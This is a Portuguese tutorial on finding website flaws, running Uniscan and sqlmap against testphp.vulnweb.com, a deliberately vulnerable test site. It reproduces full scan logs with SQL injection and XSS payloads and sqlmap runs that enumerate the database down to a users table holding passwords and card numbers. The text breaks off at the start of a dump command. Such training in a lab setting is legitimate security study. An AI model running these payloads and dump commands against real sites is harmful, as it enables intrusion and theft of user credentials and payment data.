como achar vulnerabilidades em sites

descobrir vulnerabilidades em sites é um fator muito simples, com alguns conhecimento técnico em ferramentas como por exemplo uniscan e sql injetion, estará apto para procurar vulnerabilidades em sites.

Com base neste tema, tive a ideia de criar este artigo para ensinar técnicas de ataques que são muito utilizadas para encontrar vulnerabilidades em sites.

As técnicas demonstrada aqui, é baseada em ataques web, onde os testes serão aplicadas principalmente em vulnerabilidade sites php. Vamos aplicar o testes sobre o site "Testphp.Vulnweb"onde temos a total permissão para realizarmos este tipo de testes, pois o mesmo foi criado para este objetivo, desafiar, ensinar e motivar profissionais de segurança da informação a encontrar falhas em suas aplicações.

Para esta exploração, é importante ressalta que está sendo usado a Distribuição Debian "Kali Linux" e mais duas ferramentas super importantes que já vem pré-instaladas por padrão no kali. vuln

Uniscan: Uma poderosa ferramenta de scanner de vulnerabilidade web que procura falhas comuns com por exemplo. Inclusão de arquivos locais, Execução de comandos remotos, Arquivos remotos, Sql injection, também é capaz de identificar e enumerar serviços web, arquivos e diretórios interessantes e informações do servidor.

SqlMap: Ferramenta open source para teste de penetração que automatiza o processo de detecção e exploração de vulnerabilidades a Injeção de SQL, este software bastante conhecido é utilizado geralmente por Crackers para invadir bancos de dados SQL.

Uniscan – Web Application Penetration Testing Tool

No terminal do Kali digite o comando "uniscan --help", vai retornar as funcionalidades de cada comando.
root@Kali2018-4:~# uniscan --help
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
OPTIONS:
-h help
-u <url> example: https://www.example.com/
-f <file> list of url's
-b Uniscan go to background
-q Enable Directory checks
-w Enable File checks
-e Enable robots.txt and sitemap.xml check
-d Enable Dynamic checks
-s Enable Static checks
-r Enable Stress checks
-i <dork> Bing search
-o <dork> Google search
-g Web fingerprint
-j Server fingerprint
usage:
[1] perl ./uniscan.pl -u http://www.example.com/ -qweds
[2] perl ./uniscan.pl -f sites.txt -bqweds
[3] perl ./uniscan.pl -i uniscan
[4] perl ./uniscan.pl -i "ip:xxx.xxx.xxx.xxx"
[5] perl ./uniscan.pl -o "inurl:test"
[6] perl ./uniscan.pl -u https://www.example.com/ -r

como encontrar vulnerabilidades em sites

Em seguida digite o comando "uniscan -u http://testphp.vulnweb.com/ -qweds" para que a ferramenta realize o checkup geral de vuln na aplicação. Pois esta ferramenta vai te ajudar a como descobrir vulnerabilidades em sites.

root@Kali2018-4:~# uniscan -u http://testphp.vulnweb.com/ -qweds
####################################
# Uniscan project #
# http://uniscan.sourceforge.net/ #
####################################
V. 6.3
Scan date: 10-2-2020 20:45:18
===================================================================================================
| Domain: http://testphp.vulnweb.com/
| Server: nginx/1.4.1
| IP: 176.28.50.165
===================================================================================================
|
| Directory check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/Flash/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/admin/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/images/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/pictures/
| [+] CODE: 200 URL: http://testphp.vulnweb.com/secured/
===================================================================================================
|
| File check:
| [+] CODE: 200 URL: http://testphp.vulnweb.com/CVS/Entries
| [+] CODE: 200 URL: http://testphp.vulnweb.com/favicon.ico
| [+] CODE: 200 URL: http://testphp.vulnweb.com/index.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/login.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/search.php
| [+] CODE: 200 URL: http://testphp.vulnweb.com/userinfo.php?uid=1;
===================================================================================================
|
| Check robots.txt:
|
| Check sitemap.xml:
===================================================================================================
|
| Crawler Started:
| Plugin name: E-mail Detection v.1.1 Loaded.
| Plugin name: Upload Form Detect v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: External Host Detect v.1.2 Loaded.
| Plugin name: phpinfo() Disclosure v.1 Loaded.
| Plugin name: Web Backdoor Disclosure v.1.1 Loaded.
| Plugin name: Code Disclosure v.1.1 Loaded.
| Plugin name: FCKeditor upload test v.1 Loaded.
| [+] Crawling finished, 87 URL's found!
|
| E-mails:
| [+] E-mail Found: wvs@acunetix.com
|
| File Upload Forms:
|
| Timthumb:
|
| External hosts:
| [+] External Host Found: http://www.eclectasy.com
| [+] External Host Found: http://www.acunetix.com
| [+] External Host Found: https://www.acunetix.com
| [+] External Host Found: http://blog.mindedsecurity.com
|
| PHPinfo() Disclosure:
|
| Web Backdoors:
|
| Source Code Disclosure:
| [+] Source Code Found: http://testphp.vulnweb.com/pictures/wp-config.bak
|
| FCKeditor File Upload:
|
| Ignored Files:
| http://testphp.vulnweb.com/Flash/add.fla
| http://testphp.vulnweb.com/admin/create.sql
===================================================================================================
| Dynamic tests:
| Plugin name: Learning New Directories v.1.2 Loaded.
| Plugin name: FCKedior tests v.1.1 Loaded.
| Plugin name: Timthumb <= 1.32 vulnerability v.1 Loaded.
| Plugin name: Find Backup Files v.1.2 Loaded.
| Plugin name: Blind SQL-injection tests v.1.3 Loaded.
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: PHP CGI Argument Injection v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.2 Loaded.
| Plugin name: SQL-injection tests v.1.2 Loaded.
| Plugin name: Cross-Site Scripting tests v.1.2 Loaded.
| Plugin name: Web Shell Finder v.1.3 Loaded.
| [+] 4 New directories added
|
|
| FCKeditor tests:
| Timthumb < 1.33 vulnerability:
| Backup Files:
| Blind SQL Injection:
| Local File Include:
| PHP CGI Argument Injection:
| Remote Command Execution:
| Remote File Include:
| SQL Injection:
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1'
[*] Remaining tests: 96
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=1"
[*] Remaining tests: 95
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2'
[*] Remaining tests: 94
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=2"
[*] Remaining tests: 93
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3'
[*] Remaining tests: 92
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=3"
[*] Remaining tests: 91
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4'
[*] Remaining tests: 90
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?cat=4"
[*] Remaining tests: 89
[*] Remaining tests: 88
[*] Remaining tests: 87
[*] Remaining tests: 86
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1'
[*] Remaining tests: 85
[*] Remaining tests: 84
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=1"
[*] Remaining tests: 83
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2"
[*] Remaining tests: 82
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=2'
[*] Remaining tests: 81
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3'
[*] Remaining tests: 80
| [+] Vul [SQL-i] http://testphp.vulnweb.com/listproducts.php?artist=3"
| [+] Vul [SQL-i] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123'&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| Cross-Site Scripting (XSS):
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><script>alert('XSS')</script>
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><IMG SRC="javascript:alert('XSS');">
[*] Remaining tests: 283
[*] Remaining tests: 282
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[*] Remaining tests: 281
[*] Remaining tests: 280
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
[*] Remaining tests: 279
[*] Remaining tests: 278
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><DIV STYLE="background-image: url(javascript:alert('XSS'))">
[*] Remaining tests: 277
[*] Remaining tests: 276
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><body onload="javascript:alert('XSS')"></body>
[*] Remaining tests: 275
[*] Remaining tests: 274
| [+] Vul [XSS] http://testphp.vulnweb.com/hpp/?pp="><table background="javascript:alert('XSS')"></table>
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<script>alert('XSS')</script>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 163
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<IMG SRC="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<body onload="javascript:alert('XSS')"></body>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=<table background="javascript:alert('XSS')"></table>&ucc=123&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<script>alert('XSS')</script>&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<IMG SRC="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 136
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 135
[*] Remaining tests: 134
[*] Remaining tests: 133
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<body onload="javascript:alert('XSS')"></body>&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 132
[*] Remaining tests: 131
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=<table background="javascript:alert('XSS')"></table>&uemail=123&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 130
[*] Remaining tests: 129
[*] Remaining tests: 128
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<script>alert('XSS')</script>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 127
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<IMG SRC="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 126
[*] Remaining tests: 125
[*] Remaining tests: 124
[*] Remaining tests: 123
[*] Remaining tests: 122
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 121
[*] Remaining tests: 119
[*] Remaining tests: 119
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 118
[*] Remaining tests: 117
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 116
[*] Remaining tests: 115
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<body onload="javascript:alert('XSS')"></body>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 114
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=<table background="javascript:alert('XSS')"></table>&uphone=123&signup=123&uaddress=123
[*] Remaining tests: 113
[*] Remaining tests: 112
[*] Remaining tests: 111
[*] Remaining tests: 110
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<script>alert('XSS')</script>&signup=123&uaddress=123
[*] Remaining tests: 109
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<IMG SRC="javascript:alert('XSS');">&signup=123&uaddress=123
[*] Remaining tests: 108
[*] Remaining tests: 107
[*] Remaining tests: 106
[*] Remaining tests: 105
[*] Remaining tests: 104
[*] Remaining tests: 103
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&signup=123&uaddress=123
[*] Remaining tests: 102
[*] Remaining tests: 101
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&signup=123&uaddress=123
[*] Remaining tests: 100
[*] Remaining tests: 99
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&signup=123&uaddress=123
[*] Remaining tests: 98
[*] Remaining tests: 97
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<body onload="javascript:alert('XSS')"></body>&signup=123&uaddress=123
[*] Remaining tests: 96
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=<table background="javascript:alert('XSS')"></table>&signup=123&uaddress=123
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<script>alert('XSS')</script>
[*] Remaining tests: 73
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<IMG SRC="javascript:alert('XSS');">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
[*] Remaining tests: 65
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<DIV STYLE="background-image: url(javascript:alert('XSS'))">
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<body onload="javascript:alert('XSS')"></body>
| [+] Vul [XSS] http://testphp.vulnweb.com/secured/newuser.php
| Post data: &uuname=123&upass=123&upass2=123&urname=123&ucc=123&uemail=123&uphone=123&signup=123&uaddress=<table background="javascript:alert('XSS')"></table>
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<IMG SRC="javascript:alert('XSS');">&goButton=123
[*] Remaining tests: 54
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<script>alert('XSS')</script>&goButton=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<LINK REL="stylesheet" HREF="javascript:alert('XSS');">&goButton=123
[*] Remaining tests: 47
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">&goButton=123
[*] Remaining tests: 46
[*] Remaining tests: 45
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<DIV STYLE="background-image: url(javascript:alert('XSS'))">&goButton=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<body onload="javascript:alert('XSS')"></body>&goButton=123
| [+] Vul [XSS] http://testphp.vulnweb.com/search.php?test=query
| Post data: &searchFor=<table background="javascript:alert('XSS')"></table>&goButton=123
| Web Shell Finder:
===================================================================================================
| Static tests:
| Plugin name: Local File Include tests v.1.1 Loaded.
| Plugin name: Remote Command Execution tests v.1.1 Loaded.
| Plugin name: Remote File Include tests v.1.1 Loaded.
|
|
| Local File Include:
| Remote Command Execution:
| Remote File Include:

===================================================================================================
Scan end date: 11-2-2020 0:59:55
HTML report saved in: report/testphp.vulnweb.com.html

sqlmap comandos

Da mesma forma que digitamos help para descobrir as funcionalidades de cada comando da ferramenta uniscan, iremos realizar com o SqlMap também. Digite o comando "sqlmap --help".

root@Kali2018-4:~# sqlmap --help
___
__H__
___ ___["]_____ ___ ___ {1.2.10#stable}
|_ -| . [(] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
Usage: python sqlmap [options]
Options:
-h, --help Show basic help message and exit
-hh Show advanced help message and exit
--version Show program's version number and exit
-v VERBOSE Verbosity level: 0-6 (default 1)
Target:
At least one of these options has to be provided to define the
target(s)
-u URL, --url=URL Target URL (e.g. "http://www.site.com/vuln.php?id=1")
-g GOOGLEDORK Process Google dork results as target URLs
Request:
These options can be used to specify how to connect to the target URL
--data=DATA Data string to be sent through POST
--cookie=COOKIE HTTP Cookie header value
--random-agent Use randomly selected HTTP User-Agent header value
--proxy=PROXY Use a proxy to connect to the target URL
--tor Use Tor anonymity network
--check-tor Check to see if Tor is used properly
Injection:
These options can be used to specify which parameters to test for,
provide custom injection payloads and optional tampering scripts
-p TESTPARAMETER Testable parameter(s)
--dbms=DBMS Force back-end DBMS to provided value
Detection:
These options can be used to customize the detection phase
--level=LEVEL Level of tests to perform (1-5, default 1)
--risk=RISK Risk of tests to perform (1-3, default 1)
Techniques:
These options can be used to tweak testing of specific SQL injection
techniques
--technique=TECH SQL injection techniques to use (default "BEUSTQ")
Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements
-a, --all Retrieve everything
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--passwords Enumerate DBMS users password hashes
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--schema Enumerate DBMS schema
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
-D DB DBMS database to enumerate
-T TBL DBMS database table(s) to enumerate
-C COL DBMS database table column(s) to enumerate
Operating system access:
These options can be used to access the back-end database management
system underlying operating system
--os-shell Prompt for an interactive operating system shell
--os-pwn Prompt for an OOB shell, Meterpreter or VNC
General:
These options can be used to set some general working parameters
--batch Never ask for user input, use the default behavior
--flush-session Flush session files for current target
Miscellaneous:
--sqlmap-shell Prompt for an interactive sqlmap shell
--wizard Simple wizard interface for beginner users
[!] to see full list of options run with '-hh'

Após escanear a aplicação, caso encontrar alguma vulnerabilidades ir para o próximo passo.
Escolha um dos links vulneráveis a qual o Uniscan retornou e trabalha encima dele. No meu caso vou pegar o link "http://testphp.vulnweb.com/listproducts.php?cat=1". Lembrando que a ferramenta retornou não apenas a vulnerabilidades sqlinjection como outras vulnerabilidades também. Neste caso vamos explora as vulnerabilidades de Sql Injection identificado.
Com esta vulnerabilidades será possível coletar informações do banco de dado da aplicação e realizar manipulação de dados.

Necessitamos saber em qual banco e nome da base a qual está em execução na aplicação.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
___
__H__
___ ___[(]_____ ___ ___ {1.2.10#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 22:26:01

[22:26:01] [INFO] resuming back-end DBMS 'mysql'
[22:26:02] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 9252=9252

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cat=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[22:26:04] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[22:26:04] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[22:26:05] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 22:26:05

Foi possível coletar vários informações importante que não deveriam esta exposto. O MySQL é o sistema gerenciador da base de dados que está rodando nesta aplicação, também foi possível identificar duas base de dados com o seguinte nomes, acuart e information_schema.
Vamos descobrir quantos e os nomes das tabelas que estão rodando na aplicação.
Vamos trabalhar com a base de dados acuart para este testes.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart --table
___
__H__
___ ___[,]_____ ___ ___ {1.2.10#stable}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:00:45
[19:00:45] [INFO] resuming back-end DBMS 'mysql'
[19:00:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 9252=9252
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cat=1 AND SLEEP(5)
Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[19:00:46] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[19:00:46] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema
[19:00:46] [INFO] fetching tables for database: 'acuart'
Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
[19:00:46] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'
[*] shutting down at 19:00:46

Foi possível identificar 8 tabelas com os nomes artists, carts, categ, featured, guestbook, pictures, produts, users.

Vamos ver as colunas da tabela users.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart -T users --columns
___
__H__
___ ___[.]_____ ___ ___ {1.2.10#stable}
|_ -| . [(] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:07:36

[19:07:36] [INFO] resuming back-end DBMS 'mysql'
[19:07:36] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: cat=1 AND 9252=9252

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=1 AND (SELECT 5744 FROM(SELECT COUNT(*),CONCAT(0x7162786b71,(SELECT (ELT(5744=5744,1))),0x7176626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: cat=1 AND SLEEP(5)

Type: UNION query
Title: Generic UNION query (NULL) - 11 columns
Payload: cat=1 UNION ALL SELECT CONCAT(0x7162786b71,0x4b6475656744465a615a6771444655737244686a494f66776a786776626e75777879454a77486562,0x7176626a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- Bnnk
---
[19:07:39] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.3.10
back-end DBMS: MySQL >= 5.0
[19:07:39] [INFO] fetching database names
available databases [2]:
[*] acuart
[*] information_schema

[19:07:39] [INFO] fetching columns for table 'users' in database 'acuart'
Database: acuart
Table: users
[8 columns]
+---------+--------------+
| Column | Type |
+---------+--------------+
| address | mediumtext |
| cart | varchar(100) |
| cc | varchar(100) |
| email | varchar(100) |
| name | varchar(100) |
| pass | varchar(100) |
| phone | varchar(100) |
| uname | varchar(100) |
+---------+--------------+

[19:07:39] [INFO] fetched data logged to text files under '/root/.sqlmap/output/testphp.vulnweb.com'

[*] shutting down at 19:07:39

8 Colunas identificadas, com os seguintes nomes:
address, cart, cc, email, name, pass, phone, uname.
Vamos ver as informações em cadas colunas. Queremos o principal que será o usuário e senha para logar na aplicação. Pois ja sabemos que existe uma tabela usuario e que nesta tabela contém o uname e pass.
root@Kali2018-4:~# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs -D acuart -T users -C address,cart,cc,email,name,pass,phone,uname --dump
___
__H__
___ ___["]_____ ___ ___ {1.2.10#stable}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 19:16:43
[19:16:43] [INFO] resuming back-end DBMS 'mysql'
[19:16:43] [INFO] testing connection to the target URL
